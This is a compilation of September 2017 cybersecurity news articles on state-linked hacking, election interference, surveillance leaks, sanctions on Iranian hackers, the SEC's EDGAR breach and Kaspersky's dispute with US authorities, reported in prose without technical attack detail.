The US Securities and Exchange Commission has announced it is setting up a special unit dedicated to identifying cyber-related misconduct.

The announcement came days after the top US financial regulator disclosed that it had been the victim of a hacking attack in 2016, and that the perpetrators may have been able to profit from the information.

In a statement the SEC said the new unit, which has been in the works for months, "will focus on targeting cyber-related misconduct" including market manipulation schemes, hacking and intrusions into retail brokerage accounts.

"Cyber-related threats and misconduct are among the greatest risks facing investors and the securities industry," said Stephanie Avakian, co-director of the SEC's Enforcement Division.

"The Cyber Unit will enhance our ability to detect and investigate cyber-threats through increasing expertise in an area of critical national importance."

The attack on the SEC targeted the agency's EDGAR database, which contains data from publicly traded companies such as earnings statements and corporate transactions.

A "software vulnerability" was quickly fixed after the intrusion was discovered, but the hackers had already been able to access "non-public information," the SEC said of the cyber-attack.

The news came on the heels of one of the worst-ever breaches of personal data, revealed after the American firm Equifax announced it was the victim of a hacking attack that compromised the personal data of more than 140 million Americans, 400,000 Britons and 100,000 Canadians.

Deloitte also acknowledged Monday that its computer systems had been targeted but insisted the consequences were limited.

In its announcement Monday the SEC also said it was launching a "Retail Strategy Task Force" aimed at identifying "misconduct impacting retail investors."


Even More Evidence That Russian Was Meddling in the 2016 US Election
26.9.2017 securityaffairs BigBrothers

Evidence that Russian hackers attempted to interfere with the 2016 US Election continues to pile up, DHS notified states whose systems were hit by APTs.
Evidence that Russia attempted to interfere with the 2016 US Election continues to pile up.
Rumours started almost as soon as the 2016 US Election was completed, individuals with the White House have been questioned and even Facebook identified ad campaigns funded by Russian-linked groups that appear targeted to sway voter opinions. This week we find out that the Department of Homeland Security (DHS) has notified election officials in at least 21 states that they were targeted by Russian-linked groups during the 2016 US Election.
In February of 2017, several States accused the DHS of trying to hack their state electoral systems during the previous months. Indiana, Ohio, Georgia, Idaho all claimed that the DHS had performed security scans of their networks without permission. Kentucky and West Virginia also reported evidence of DHS “security scans” but said that the work was previously authorized. It seems that the scans were not originated by the DHS but by Russian-linked hacking groups.

2016 US Election

In June of 2017, DHS cybersecurity official Jeanette Manfra confirmed that the Department had determined as early as October 2016, “that Internet-connected election-related networks, including websites, in 21 states were potentially targeted by Russian government cyber actors.” In a US Senate Intelligence Committee hearing in July, DHS officials claimed, “the owners of the systems within those 21 states have been notified.” But that is misleading. The DHS does not disclose which States it notified, but some of those states coming forward admit they were not notified until after the July Committee meeting.

Understandably, many people are critical of how long it took the DHS to notify potentially impacted States:


NBC Politics ✔@NBCPolitics
JUST IN: “Russian government cyber actors” unsuccessfully attempted to hack 2016 election results in Wisconsin, DHS tells state officials

10:44 PM - Sep 22, 2017
854 854 Replies 4,265 4,265 Retweets 4,362 4,362 likes
Twitter Ads info and privacy
“It’s unacceptable that it took almost a year after the election to notify states that their elections systems were targeted, but I’m relieved that DHS has acted upon our numerous request,” said Virginia Senator Mark Warner, the Intelligence Committee’s top Democrat, who is helping lead the Senate’s investigation into Russia’s election meddling.

The DHS is in a difficult position. In the final months of 2016, State officials and DHS determined that “someone” was scanning for potential vulnerabilities in election-related networks. This is one of the first steps to compromise and happens thousands of times a day.
Attribution — trying to determine who is behind the scanning — is very challenging. Several States suspected the DHS of scanning while it now seems to have been the work of Russian-linked groups. On one hand, the DHS needs to inform targeted States that they are facing an elevated risk. On the other hand, they need to provide meaningful information to allow those States to take appropriate actions. In most cases, it appears no action was required. Arizona admits that hackers obtained the username and password for a County official and Illinois officials confirmed that hackers had breached its voter system. The other 19 States have not identified any successful penetrations of their networks. So far, it appears that the long delay in notifications from the DHS did not impact voters’ information or election results.
According to the Associated Press the 21 States that were notified of Russian-linked security scans against their networks include: Alabama, Alaska, Arizona, California, Colorado, Connecticut, Delaware, Florida, Illinois, Iowa, Maryland, Minnesota, North Dakota, Ohio, Oklahoma, Oregon, Pennsylvania, Texas, Virginia, Washington and Wisconsin.


Banking Trojan Uses NSA-Linked Exploit
26.9.2017 securityweek BigBrothers
Newly observed Retefe banking Trojan samples have implemented the National Security Agency-related EternalBlue exploit, Proofpoint security researchers have discovered.

Unlike previous malware attacks that exploited EternalBlue, however, the new campaign doesn’t abuse it to spread in an infinite loop. In fact, the exploit-carrying samples are distributed via spam emails, while the version dropped via EternalBlue lacks the exploit.

EternalBlue is a NSA-linked tool that became public in April, one month after Microsoft released a patch for it. The exploit leverages a vulnerability in Windows’ Server Message Block (SMB) on port 445, allowing attackers to have malicious code automatically executed on vulnerable systems.

The exploit became highly popular after being abused in the massive WannaCry ransomware campaign that unfolded in May this year. Other malware, however had been abusing it for weeks.

In a recent campaign targeting users in Switzerland, some of the Retefe samples Proofpoint has collected starting with September 5 revealed the use of EternalBlue for lateral movement capabilities.

Retefe is a banking Trojan active since 2013, well known for its continuous focus on users in Austria, Sweden, Switzerland and Japan. The malware operates by routing traffic to and from the targeted banks through proxy servers, often hosted on the TOR network.

Recently, the malware has been mostly distributed through spam email campaigns where a Microsoft Office document was attached to the messages. Leveraging social engineering, the attackers use the attachments to trick users into downloading a malicious payload,

In recent campaigns, a self-extracting Zip archive containing a multiply-obfuscated JavaScript installer was downloaded. While analyzing the installer code, the security researchers have discovered that recent samples contained a new parameter designed to implement the EternalBlue exploit.

The code was borrowed from a publicly available proof-of-concept posted on GitHub, but functionality to log the installation and victim configuration details was also included. Last week, the parameter was replaced with a new one that contains only the logging functions.

“The EternalBlue exploit downloads a PowerShell script from a remote server, which itself includes an embedded executable that installs Retefe. This installation, however, lacks the module responsible for further lateral spread via EternalBlue, thus avoiding an infinite spreading loop,” Proofpoint says.

The security researchers also note that malware versions compatible with Mac OS have been distributed between June and August this year.

“While far less widespread than other banking Trojans like Dridex or The Trick, the focus on Swiss banks provides the Retefe group with potential high-profile targets. In addition, we are observing increasingly targeted attacks from this group that, with the addition of the EternalBlue exploit, creates opportunities for effective propagation within networks once initial targets have been compromised,” Proofpoint notes.


DHS Notifies States Targeted by Russia in Election Hacks
25.9.2017 securityweek BigBrothers
The U.S. Department of Homeland Security (DHS) has finally notified the states whose systems were targeted by hackers before last year’s presidential election.

DHS officials told the Senate Intelligence Committee in June that a threat group believed to be working for the Russian government had targeted websites and other voting-related systems in 21 states.

The agency said at the time that only a small number of networks were actually breached, and it did not find any evidence that vote tallies had been altered. Nevertheless, many officials agree that Russia did at least try to influence the outcome of the election.

The DHS has now informed state officials about the attacks in an effort to help them improve the security of their systems before next year’s midterm elections.

The DHS has not named any of the targets, but some state officials published statements on their websites or social media profiles. The list of states that admitted being contacted by the agency include Alabama, Arizona, California, Connecticut, Colorado, Iowa, Minnesota, Wisconsin and Washington.

The Associated Press and other news agencies reported that the list of targeted states also includes Alaska, Delaware, Florida, Maryland, North Dakota, Ohio, Oklahoma, Oregon, Pennsylvania, Texas and Virginia. Illinois was named one of the targets in the summer of 2016, when officials shut down voter registration after hackers gained access to as many as 200,000 records.

All the states that published statements about being notified by the DHS said their systems were either only scanned for vulnerabilities, or their security products blocked the intrusion attempts.

Colorado, for instance, sought to reassure voters, pointing out that its systems were only scanned and compared the process to “burglars jiggling the doors of a house and moving on when they realize the doors are locked.”

While the attacks do not appear to have had a significant impact, some officials are displeased with the fact that it has taken the DHS so long to notify officials.

“It's unacceptable that it took almost a year after the election to notify states that their elections systems were targeted, but I'm relieved that DHS has acted upon our numerous requests and is finally informing the top elections officials in all 21 affected states that Russian hackers tried to breach their systems in the run up to the 2016 election,” said Sen. Mark R. Warner (D-VA), vice chairman of the Senate Select Committee on Intelligence.

“We have to do better in the future. Our elections are the bedrock of our democracy, and DHS needs to notify states and localities in real-time when their systems are targeted,” Sen. Warner added. “While I understand that DHS detects thousands of attempted cyber attacks daily, I expect the top election officials of each state to be made aware of all such attempted intrusions, successful or not, so that they can strengthen their defenses -- just as any homeowner would expect the alarm company to inform them of all break-in attempts, even if the burglar doesn't actually get inside the house.”

Congressman Adam Schiff said on Twitter that the DHS should notify states of attempted election hacking in real time.

Adam Schiff election hacking tweet

California Secretary of State Alex Padilla is also displeased with the fact that the notification came so late.

“It is completely unacceptable that it has taken DHS over a year to inform our office of Russian scanning of our systems, despite our repeated requests for information. The practice of withholding critical information from elections officials is a detriment to the security of our elections and our democracy,” Padilla stated.

“In a letter I sent to Admiral Michael S. Rogers of the National Security Agency (NSA) earlier this year in June, I expressed serious concern about the NSA's failure to provide timely and critical information to America's elections officials. We shouldn’t have to learn about potential threats from leaked NSA documents or media reports. It is the intelligence community’s responsibility to inform elections officials of any potential threats to our elections. They failed in this responsibility,” Padilla added.


Germany on Guard Against Election Hacks, Fake News
22.9.2017 Securityweek BigBrothers
As the clock ticks down to elections Sunday, Germany's cyber defense nervously hopes it'll be third time lucky after Russia was accused of meddling in the US and French votes.

But even if Berlin avoids a last-minute bombshell of leaks or online sabotage, it sees Moscow's hand in fanning fears of Muslim migrants that are driving the rise of the hard-right.

Forecasters say Chancellor Angela Merkel is almost certain to win.

But she will also face, for the first time in German post-war history, a right-wing populist and anti-immigration party will have its own group on the opposition benches.

The Alternative for Germany (AfD) -- which calls Merkel a "traitor" for her 2015 welcome to refugees -- has been promoted especially in internet echo chambers by far-right trolls and ultra-nationalists.

While mainstream media have treated the AfD with distaste, the most positive coverage has appeared in Kremlin-funded media such as RT and Sputnik, which have also heavily focussed on migrant crime.

The London School of Economics (LSE) found that "official Russian media and unofficial pro-Russian trolls offer constant and repetitive support for the AfD and its anti-immigrant message," wrote journalist Anne Applebaum, a participant in the monitoring project.

The AfD, meanwhile, has been actively courting the 2.5 million-strong Russian-German community with neighbourhood stands, flyer campaigns and a Russian-language YouTube channel.

Especially elderly and poor Russian-Germans have been receptive to xenophobic and anti-Muslim messages amid the 2015 mass migrant influx, said Berlin community leader Alexander Reiser.

"The fear was stoked by Russian TV, which presented it as a catastrophe, of Europe being flooded by migrants," he said, pointing also to Russians' "traumatic memories" of the Soviet collapse and Russia's wars against Islamic fundamentalists.

- Sowing doubt, discord -

The risk of Moscow attempting to use Russian-Germans as pawns moved into the spotlight with the 2016 case of "Our Lisa".

Russian media spread the story -- quickly debunked by German police -- of three Muslim men who raped a 13-year-old Russian-German girl, and of a subsequent cover-up by police and politicians.

It sparked Russian-German street protests that escalated into a top-level diplomatic dispute between Berlin and Moscow.

Many Russian-Germans believed the conspiracy tale because they "projected their Russia experience onto the case," said Reiser, who estimated that 15-20 percent remain "stuck in a totalitarian way of thinking and will never fully understand democracy".

A top-level government official told AFP the Lisa case was Berlin's "wake-up call" on Russian propaganda.

Other fake news stories followed, including one claiming German NATO soldiers in Lithuania raped a young girl.

Berlin's biggest fear, however, has focussed on a massive 2015 malware attack that crippled the Bundestag parliamentary network for days.

It netted 17 gigabytes of data which, officials feared, could be used to blackmail MPs or discredit them, possibly on new "BTLeaks" websites.

German security chiefs said "smoking gun" proof was impossible but blamed the hacker group known as Fancy Bear or APT28, which has been linked to Russia's GRU military intelligence and accused of attacks on Hillary Clinton's 2016 presidential campaign.

IT security experts sprang into action by drilling MPs and sensitising the public about the risk of online mischief, meme wars and other disinformation designed to sow doubt and discord and delegitimise the democratic process.

Security agencies BND and BfV warned of Russian influence operations, the IT security agency BSI started war-gaming attacks, and the military launched a Cyber Command while musing about the option of "hack-back" counterstrikes.

- Patriotic hackers -

The Brookings Institution's Constanze Stelzenmueller told a US Senate committee in June that "for a Russia that is clearly bent on destabilising Europe and the transatlantic alliance, Germany is the prize".

Russian President Vladimir Putin has denied Moscow seeks to influence foreign elections but said that "patriotic hackers" are beyond Moscow's control.

Weeks after Trump's election, Merkel consulted experts about fake news and the bot algorithms that make them go viral.

"She was very interested, but not panicking," recalled Simon Hegelich of Munich's Technical University.

Media outlets ramped up fact-checking teams, political parties pledged not to use campaign bots, and a new law passed threatening to heavily fine social media giants that fail to speedily remove hate speech and other "illegal content".

Days before the election, there has been no mass leak, raising cautious speculation as to why Germany may have been spared.

For one, Germany's multi-party elections are harder to swing than a presidential two-horse race, and Merkel enjoys a huge, double-digit lead.

Then there is the risk of a damaging backlash, and of alienating pro-Russia lawmakers found across the German party system.

Interior Minister Thomas de Maiziere said Wednesday that "we have no indication that Putin interfered in the election".

On a note of caution, he added: "Maybe they decided not to do it, maybe it's still coming."


SEC Says It Was Hacked in 2016
21.9.2017 securityweek BigBrothers
The United States Securities and Exchange Commission (SEC) said late Wednesday that it was the victim of a cyber-attack in 2016 that may have allowed hackers to profit through trading on non-public information in its EDGAR filing system.

“In August 2017, the Commission learned that an incident previously detected in 2016 may have provided the basis for illicit gain through trading,” the Commission announced.

“Specifically, a software vulnerability in the test filing component of the Commission’s EDGAR system, which was patched promptly after discovery, was exploited and resulted in access to nonpublic information,” the announcement continued.

SEC HackedAn internal investigation was commenced immediately at the direction of SEC Chairman Jay Clayton.

According to Clayton, the EDGAR system receives and processes over 1.7 million electronic filings per year.

“While we don’t have any technical details of the data breach, I would refrain from making any conclusions about its origins or attackers,” Ilia Kolochenko, CEO of web security company High-Tech Bridge, told SecurityWeek. “The SEC statement is very obscure and may provoke speculation and rumors around it, including attempts to blame nation-states or attribute it to (in)famous hacking groups.”

SEC Hacked

While the SEC did not make any suggestion on the possible threat actor(s) behind the attack, it is certainly not the first-time attackers have targeted non-public company information that could have been used to gain insights leading to profits.

In March 2017, FireEye shared details of a cybercrime group tracked by the company as FIN7, which had been observed targeting nearly a dozen organizations in the United States, focusing on personnel that handles filings to the SEC.

In August 2015, the SEC announced that a cybercriminal group hacked into newswire services to steal non-public information about corporate earnings announcements that were used to make financial trades that generated more than $100 million in illegal profits.

In December 2016, the SEC charged three Chinese men accused of hacking into two New York-based law firms to steal information related to clients that were considering mergers or acquisitions, which the hackers then used to trade.

“Cybersecurity is critical to the operations of our markets and the risks are significant and, in many cases, systemic,” Chairman Clayton said in a statement. “We must be vigilant. We also must recognize—in both the public and private sectors, including the SEC—that there will be intrusions, and that a key component of cyber risk management is resilience and recovery.”

In a related statement, Clayton detailed the SEC's approach to cybersecurity as an organization and as a regulatory body.

“This incident clearly exposes how vulnerable our global financial ecosystem is, and how unprepared we are to fight skyrocketing cybercrime,” Kolochenko added. “In the future we will see steady fusion of common crime with cyber gangs that jointly may challenge state power and dictate their laws, while law enforcement agencies are catastrophically underfinanced by governments and just don’t have enough resource to tackle global cybercrime.”

The SEC said that the 2016 intrusion "did not result in unauthorized access to personally identifiable information, jeopardize the operations of the Commission, or result in systemic risk.”

News of the SEC hack comes less than two weeks after credit reporting agency Equifax said it was the victim of a massive cyber-attack that exposed sensitive data on more than 143 million people.


Iranian Hackers Target Aerospace, Energy Companies
20.9.2017 securityweek BigBrothers
A cyber espionage group linked by security researchers to the Iranian government has been observed targeting aerospace and energy organizations in the United States, Saudi Arabia and South Korea.

The threat actor, tracked by FireEye as APT33, is believed to have been around since at least 2013. Since mid-2016, the security firm has spotted attacks aimed by this group at the aviation sector, including military and commercial aviation, and energy companies with connections to petrochemical production.

Specifically, the cyberspies targeted a U.S. organization in the aerospace sector, a Saudi Arabian business conglomerate with aviation holdings, and a South Korean firm involved in oil refining and petrochemicals. In recent attacks, the hackers used job vacancies at a Saudi Arabian petrochemical firm to target the employees of organizations in South Korea and Saudi Arabia.Iranian hackers launch attacks on energy and aviation companies

“We assess the targeting of multiple companies with aviation-related partnerships to Saudi Arabia indicates that APT33 may possibly be looking to gain insights on Saudi Arabia’s military aviation capabilities to enhance Iran’s domestic aviation capabilities or to support Iran’s military and strategic decision making vis a vis Saudi Arabia,” FireEye said in a blog post.

“We believe the targeting of the Saudi organization may have been an attempt to gain insight into regional rivals, while the targeting of South Korean companies may be due to South Korea’s recent partnerships with Iran’s petrochemical industry as well as South Korea’s relationships with Saudi petrochemical companies,” the company added.

According to FireEye, the cyber espionage group sent hundreds of spear phishing emails last year. They set up several domains made to look as if they belonged to Saudi aviation firms and international organizations that work with them, including Alsalam Aircraft Company, Boeing and Northrop Grumman Aviation Arabia.

The malware used by the group includes a dropper tracked by FireEye as DROPSHOT, a wiper named SHAPESHIFT, and a backdoor called TURNEDUP. DROPSHOT was previously analyzed by Kaspersky, which tracks it as StoneDrill.

The StoneDrill malware was tied by Kaspersky to the notorious Shamoon 2 and Charming Kitten (aka Newscaster and NewsBeef), a threat actor believed to be operating out of Iran.

FireEye has also linked APT33 to Iran based on connections to the “Nasr Institute,” which is said to be Iran’s “cyber army”, attacks launched during Iranian working hours, and the use of Iranian hacking tools.

Iran appears to have several cyber espionage groups, including Rocket Kitten, Cobalt Gypsy (Magic Hound), Charming Kitten and CopyKittens.


Wikileaks Spy File Russia – the surveillance apparatus implemented by firm Peter-Service
20.9.2017 securityaffairs BigBrothers

Wikileaks releases a new batch of documents that claim to detail the Russia mass surveillance apparatus implemented with the help of firm Peter-Service.
Wikileaks has released a batch of documents, dubbed Spy File Russia, that detail the surveillance infrastructure implemented by Russia. The Kremlin’s surveillance apparatus allows the Russian agencies to spy online activities and mobile devices.

According to the Italian Wikileaks media partners, the Italian newspaper La Repubblica, the documents cover “an extended timespan from 2007 to June 2015”.


WikiLeaks ✔@wikileaks
RELEASE: Spy Files #Russia https://wikileaks.org/spyfiles/russia/ … #SORM #FSB

11:25 AM - Sep 19, 2017
78 78 Replies 1,307 1,307 Retweets 1,307 1,307 likes
Twitter Ads info and privacy
This is the first time Wikileaks has leaked material related to the Russian state, documents report of a Russian company which supplies software to telecommunication companies that is also installing equipment used by Russian state agencies to tap into.

It is a surveillance apparatus that enable the Russian intelligence to search and spy on citizens’ digital activity,

Wikileaks released 34 “base documents” relate to the activity of a St. Petersburg-based company, called Peter-Service. The company is a contractor for Russian state surveillance, it was set up in 1992 to provide billing solutions, it is a major supplier of software to the mobile telecoms operators.

“The technologies developed and deployed by PETER-SERVICE today go far beyond the classical billing process and extend into the realms of surveillance and control. Although compliance to the strict surveillance laws is mandatory in Russia, rather than being forced to comply PETER-SERVICE appears to be quite actively pursuing partnership and commercial opportunities with the state intelligence apparatus.” reported Wikileaks

“As a matter of fact PETER-SERVICE is uniquely placed as a surveillance partner due to the remarkable visibility their products provide into the data of Russian subscribers of mobile operators, which expose to PETER-SERVICE valuable metadata, including phone and message records, device identifiers (IMEI, MAC addresses), network identifiers (IP addresses), cell tower information and much more. This enriched and aggregated metadata is of course of interest to Russian authorities, whose access became a core component of the system architecture.”

Wikileaks PETER-SERVICE software architecture

It is interesting to note that the leaked documents never reference the Russia intelligence agency, the FSB, but “speak only of state agencies.”

Under Russia law operators must maintain a Data Retention System (DRS) that allows them to store data for up to three years.

“The Peter-Service DRS system allows Russian state agencies to query the database of all stored data to search for information such as calls made by a certain telephone company customer, the payment systems used, the cell that served the specific mobile. The manuals published by WikiLeaks contain the images of the interfaces that allow agents to search within this huge trove of data, so access is simple and intuitive.” wrote Stefania Maurizi, on the Italian media outlet La Repubblica.

According to Wikileaks, Peter-Service’s DRS solution can handle 500,000,000 connections per day in just one cluster, the system has high performance, the claimed average search time for subscriber related-records from a single day is ten seconds.

“The data retention system is a mandatory component for operators by law; it stores all communication (meta-)data locally for three years. State intelligence authorities use the Protocol 538 adapter built into the DRS to access stored information.” continues Wikileaks.

The Peter-Service has also developed a system called TDM (Traffic Data Mart), that records and monitors IP traffic for all mobile devices registered with the operator.

The system enables Russian agencies to track online activity of the targets, including visited sites, forums, social media.

The TDM maintains a list of categorized domain names — “which cover all areas of interest for the state. These categories include blacklisted sites, criminal sites, blogs, webmail, weapons, botnet, narcotics, betting, aggression, racism, terrorism and many more”.

“Based on the collected information the system allows the creation of reports for subscriber devices (identified by IMEI/TAC, brand, model) for a specified time range: Top categories by volume, top sites by volume, top sites by time spent, protocol usage (browsing, mail, telephony, bittorrent) and traffic/time distribution,”.

Wikileaks points to a 2013 Peter-Service slideshow presentation that was published on the company website that focuses on a new product, called DPI*GRID; The product is a hardware equipment for Deep Packet Inspection that takes the form of “black boxes” apparently able to handle 10Gb/s traffic per unit.

“However, the core of the presentation is about a new product (2013) called DPI*GRID – a hardware solution for “Deep Packet Inspection” that comes literally as “black boxes” that are able to handle 10Gb/s traffic per unit.” continues Wikileaks.”The national providers are aggregating Internet traffic in their infrastructure and are redirecting/duplicating the full stream to DPI*GRID units. The units inspect and analyse traffic (the presentation does not describe that process in much detail); the resulting metadata and extracted information are collected in a database for further investigation. A similar, yet smaller solution called MDH/DRS is available for regional providers who send aggregated IP traffic via a 10Gb/s connection to MDH for processing.”

wikileaks Russian survellance 2

Peter-Service argues that Moscow must be able to make better use of the power of data and reliance on itself. “Who controls the information, controls the world,” concludes Peter-Service, pointing out how much President Obama’s power of America is based on NSA’s mass surveillance, as revealed by Snowden.

“Drawing specifically on the NSA Prism program, the presentation offers law enforcement, intelligence and other interested parties, to join an alliance in order to establish equivalent data-mining operations in Russia,” it adds — sticking its boot firmly back into U.S. government mass surveillance programs.


US Treasury announced sanctions against seven Iranian nationals and other entities
18.9.2017 securityaffairs BigBrothers

The U.S. Department of the Treasury’s Office of Foreign Assets Control (OFAC) sanctioned 11 entities and Iranian nationals for malicious cyber-enabled activity.
The U.S. Department of the Treasury’s Office of Foreign Assets Control (OFAC) sanctioned 11 entities and individuals for malicious cyber-enabled activity.
US Dept. of Treasury announced sanctions against 7 Iranian nationals and security firms for ‘malicious cyber-activity’ against US entities.

The seven Iranians were employed by ITSecTeam (ITSEC) and Mersad Company (MERSAD), both private companies were working for the Iranian government and the Islamic Revolutionary Guard.

The Iran’s Islamic Revolutionary Guard Corps, a branch of Iran’s Armed Forces founded after the Iranian Revolution on 5 May 1979.
The Iranian nationals were indicted by the US Department of Justice in early 2016, the US authorities charged seven Iranian hackers for attacking computer systems at banks and a dam in New York.

Now the Treasury’s Office of Foreign Assets Control (OFAC) has sanctioned a total of 11 Iranian entities and individuals for alleged support of hacking activities as well as two Iran-based networks that were involved in a massive distributed denial-of-service attacks that targeted the US financial institutions in 2012.

“OFAC designated private Iranian computer security company ITSec Team pursuant to E.O. 13694 for causing a significant disruption to the availability of a computer or network of computers. Between approximately December 2011 and December 2012, ITSec Team planned and executed distributed denial of service (DDoS) attacks against at least nine large U.S. financial institutions, including top U.S. banks and U.S. stock exchanges. During that time, ITSec Team performed work on behalf of the Iranian Government, including the IRGC.” states the press release issued by the US Treasury.

“OFAC also designated three Iranian nationals for acting for or on behalf of ITSec Team. Ahmad Fathi was responsible for supervising and coordinating ITSec Team’s DDoS attacks against the U.S. financial sector. Amin Shokohi, a computer hacker who worked for ITSec Team, helped build the botnet that ITSec Team used in its DDoS attacks against U.S. financial institutions. Hamid Firoozi, a network manager at ITSec Team, procured computer servers for the botnet that ITSec Team used in its DDoS activities targeting the U.S. financial sector.”

Iranian nationals sanctioned

Ahmad Fathi, 37; Hamid Firoozi, 34; Amin Shokohi, 25; Sadegh Ahmadzadegan, aka Nitr0jen26, 23; Omid Ghaffarinia, aka PLuS, 25; Sina Keissar, 25; and Nader Saedi, aka Turk Server, 26; were charged to have launched DDoS attacks against 46 organizations, most of which US financial institutions from late 2011 to mid-2013.

Firoozi was also charged with hacking into a server at a New York dam between August and September 2013.

“Hamid Firoozi, a network manager at ITSec Team, procured computer servers for the botnet that ITSec Team used in its DDoS activities targeting the U.S. financial sector.” continues the press release.

The Treasury Department’s has decided to block all property and interests in property of the Iranians entities and U.S. citizens are generally prohibited from engaging in transactions with them.
“As a result of today’s actions, all property and interests in property of those designated subject to U.S. jurisdiction are blocked, and U.S. persons are generally prohibited from engaging in transactions with them.” states the press release. “In addition, foreign financial institutions that facilitate significant transactions for, or persons that provide material or certain other support to, the entities and individuals designated today risk exposure to sanctions that could sever their access to the U.S. financial system or block their property and interests in property under U.S. jurisdiction.”
Of course, any foreign financial institutions will support the sanctioned individuals or entities will also face possible sanctions.


75,000 Turks Arrested So Far for Downloading Encrypted Messaging App
15.9.2017 thehackernews  BigBrothers

WARNING: If you are Turkish and using or have installed ByLock—a little-known encrypted messaging app—you could be detained by Turkish authorities.
You might be thinking why???
Because using this app in Turkish is illegal since last year.
The background story begins here...
Remember the deadliest Turkey's failed coup attempt?
In July 2016, a section of the Turkish military launched a coordinated operation—by deploying soldiers, tanks on the streets of major Turkish cities—to topple the government and unseat President Recep Tayyip Erdogan.
The Turkish government blamed Muhammed Fethullah Gülen, a Turkish preacher who lives in the United States, for leading the July 15-16 attempted coup, though Gülen denied any involvement.
In the aftermath of the coup attempt, Milli İstihbarat Teºkilatı (MİT), the Turkish intelligence agency investigated and found that the ByLock messaging app was used as a communication tool by tens of thousands of Gülen movement followers to coordinate the coup.

Since then the Turkish government has detained 75,000 people in an unprecedented crackdown for downloading the ByLock app, which has been declared illegal, according to the Guardian.
Arrested people includes civil servants, judges, police officers, soldiers, house makers, and businessmen, who allegedly participated in the failed military coup attempt.
For those unaware, ByLock was one of the many encrypted messaging apps available to download for free on Apple's App Store and Google's Play Store and was downloaded over 600,000 times between April 2014 and April 2016, according to a report by British computer forensics expert, Thomas K. Moore.
It turns out that the Turkish authorities were able to crack ByLock because of its weak encryption algorithm and managed to decrypt 10 million encrypted messages, which lead to evidence against thousands of rebels and undercover Gülenist operatives.
The Turkish government also believes that ByLock has been created by the Fetullahist Terrorist Organization (FETÖ), for delivering Gülen's messages among his followers as well as to instruct them on how to carry out plots against anti-Gülenists.
According to a legal opinion published in London, arresting people on the basis of just downloading an encrypted messaging app violates their human rights under Article 5 of the European Convention on Human Rights (ECHR), which guarantees the right to liberty.


Trump Blocks Chinese Acquisition of U.S. Semiconductor Firm

15.9.2017 securityweek BigBrothers
President Donald Trump on Wednesday blocked attempts by a Chinese state-owned firm to acquire an American semiconductor manufacturer on national security concerns, drawing a rebuke from Beijing.

The acquisition of Lattice Semiconductor Corporation, a publicly-traded Oregon company, by Chinese-owned Canyon Bridge Fund could endanger the US government's use of sensitive products the company produces, the Treasury Department said in a statement.

The Trump administration has adopted an aggressive stance towards China on trade and national security matters, launching wide-ranging investigations into the national security ramifications of Beijing's trade in aluminum and steel.

Trump has the authority to block foreign investments he deems national security threats through the Committee on Foreign Investments in the United States, an interagency committee.

In the case of Lattice, CFIUS and the president decided "the transaction poses a risk to the national security of the United States that cannot be resolved through mitigation," the Treasury said in a statement.

The decision prohibited Canyon Bridge, its partner Yitai Capital and Yitai's parent, the China Venture Capital Fund Corp (CVCF), from purchasing the US firm, which serves the consumer, communications and industrial markets.

The Treasury said the deal posed a national security risk due to Beijing's support for the transaction, the potential transfer of intellectual property to the foreign investors, and the importance of the semiconductor supply to the US government, including Lattice's products.

China's Ministry of Commerce expressed "concern" over the decision Thursday.

Spokesman Gao Feng told reporters at a regular press briefing that while each country has a right to probe investments in "sensitive fields", the power should not be used as "an instrument for implementing protectionism."

China "hopes relevant countries can treat Chinese companies' overseas acquisitions objectively and impartially, give fair treatment to such normal business practices, and create a reasonable and transparent business environment to avoid impacting investors' confidence," he said, according to a transcript of the remarks on the ministry's website.

Lattice manufactures programmable logic devices, which are semiconductors that can be programmed to provide functions similar to chips, the statement said.

Trump personally intervened in the process after the companies appealed to him directly to overrule the CFIUS ruling, according to The Wall Street Journal.

Trump's predecessor, Barack Obama, had also intervened to prevent a similar deal involving semiconductors on security concerns last year.

Chinese government-backed Grand Chip Investment scrapped plans to buy German semiconductor equipment maker Aixtron in December after Washington rejected the inclusion of Aixtron's US unit over fears it could put sensitive technology with potential military applications in Chinese hands.

"It is important to note that the US government has been particularly concerned with foreign investment, particularly Chinese investment, into the US semiconductor industry for years," said Lawrence Ward, a partner at the international law firm Dorsey & Whitney in global business focusing on US national security law.

"It is likely premature to think that the Trump administration is taking a hawkish approach to Chinese investment across all industry sectors but, of course, only time will tell," Ward said.


Kaspersky Chief Agrees to Testify Before Congress

15.9.2017 securityweek BigBrothers
After the U.S. Department of Homeland Security (DHS) issued a binding operational directive ordering government departments and agencies to stop using products from Russia-based Kaspersky Lab, the security firm’s CEO has been invited to testify before Congress.

Eugene Kaspersky, Kaspersky Lab’s chairman and CEO, posted on Twitter a screenshot of the invitation he received from the U.S. House of Representatives’ Oversight Subcommittee of the Committee on Science, Space, and Technology.

While the CEO has accepted the invitation to testify, the hearing has been scheduled for September 27, which might not give him enough time to obtain a U.S. visa.

Eugene Kaspersky to testify before U.S. congress

“Hope to get expedited visa,” Kaspersky said on Twitter. “As of today it takes ~2 months to get one.”

In the letter sent to Kaspersky, the government said the purpose of the hearing is to “conduct oversight of the cybersecurity posture of the federal government, and examine the extent to which the federal government utilizes your company’s products.” The hearing will also review the implementation by federal agencies of the recent Executive Order on strengthening the cybersecurity of federal networks and critical infrastructure, and the NIST cybersecurity framework.

There have been numerous media reports in the past months about Kaspersky’s alleged ties to Russian intelligence, which has raised concerns among officials, ultimately leading to the U.S. General Services Administration removing Kaspersky Lab from its list of approved vendors, and the DHS ordering government agencies to establish and implement a plan for the replacement of such products in the next 90 days.

In addition to Kaspersky Lab’s alleged ties to Russian intelligence, the DHS’s binding operational directive also references Russian laws that allegedly allow the country’s intelligence agencies to request or compel assistance from Kaspersky. However, the company pointed out that these laws only apply to ISPs and other telecoms services providers.

The announcement made by the DHS this week said Kaspersky will be given the opportunity to submit a written response to address or mitigate concerns, which the security firm welcomed.

In many cases, Kaspersky provided point-by-point responses to the allegations included in media articles regarding the company’s ties to the Russian government, but those arguments have not had any effect on the decisions and proposals made by U.S. officials. On the other hand, many members of the cybersecurity industry pointed out that no evidence has been provided to prove the antivirus company’s alleged inappropriate connections.

“I've repeatedly offered to meet with government officials, testify before the U.S. Congress, provide the company's source code for an official audit and discuss any other means to help address any questions the U.S. government has about Kaspersky Lab - whatever it takes, I will do it. And I look forward to working with any agency or government officials that are interested,” Kaspersky said in a piece published by Forbes.

“So what exactly is going on? Well, it looks to me like the reason for being shunned (despite our many offers to assist) can only be one thing: geopolitical turbulence,” Kaspersky explained. “As I've said before, it's not popular to be Russian right now in some countries, but we cannot change our roots, and frankly, having these roots do not make us guilty.”

